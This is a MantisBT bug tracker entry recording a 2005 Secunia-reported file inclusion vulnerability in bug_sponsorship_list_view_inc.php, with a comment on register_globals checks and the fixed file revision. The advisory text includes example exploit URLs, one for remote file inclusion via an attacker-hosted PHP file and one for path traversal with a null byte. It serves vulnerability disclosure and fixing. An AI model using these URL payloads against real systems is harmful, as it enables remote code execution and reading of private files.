0006273: File Inclusion Vulnerability - MantisBT - Signup temporarily disabled due to spam

ID	Project	Category	View Status	Date Submitted	Last Update

0006273	mantisbt	security	public	2005-09-20 06:58	2006-10-09 11:55

Reporter	vboctor	Assigned To	vboctor
Priority	normal	Severity	minor	Reproducibility	always
Status	closed	Resolution	fixed
Product Version	1.0.0rc2
Fixed in Version	1.0.0rc3

Summary	0006273: File Inclusion Vulnerability
Description	Andreas Sandblad, Secunia Research has discovered a vulnerability in Mantis, which can be exploited by malicious people to compromise a vulnerable system. Input passed to the "t_core_path" parameter in "bug_sponsorship_list_view_inc.php" isn't properly verified, before it used to include files. This can be exploited to include arbitrary files from external and local resources. We have assigned the vulnerability Secunia Advisory SA16818 and have put a preliminary release date on our advisory for 12 October 2005, 1PM CET. Please inform us when you would expect to issue a patch or updated version. Examples: http://[host]/mantis-1.0.0rc2/bug_sponsorship_list_view_inc.php? t_core_path=http://[host]/[file].php? http://[host]/mantis-1.0.0rc2/bug_sponsorship_list_view_inc.php? t_core_path=../../../../../../../[file]%00 Successful exploitation requires that "register_globals" is enabled (not recommended setting). The vulnerability has been confirmed in version 1.0.0rc2. Other versions may also be affected.
Tags	No tags attached.

ryandesign 2005-09-20 11:05 reporter ~0011403	0005956:0010823 says we want to treat register_globals==ON as a fatal error, with which I couldn't agree more. Is that not in 1.0.0rc1 or 1.0.0rc2? 0005956:0010823 suggests it would be, but the existence of 0006273 implies that it is not. Or are we perhaps only checking for register_globals==OFF in the setup scripts, and not at the top of every page as we would need to?

vboctor 2005-10-28 19:57 manager ~0011560	bug_sponsorship_list_view_inc.php -> 1.12.4.1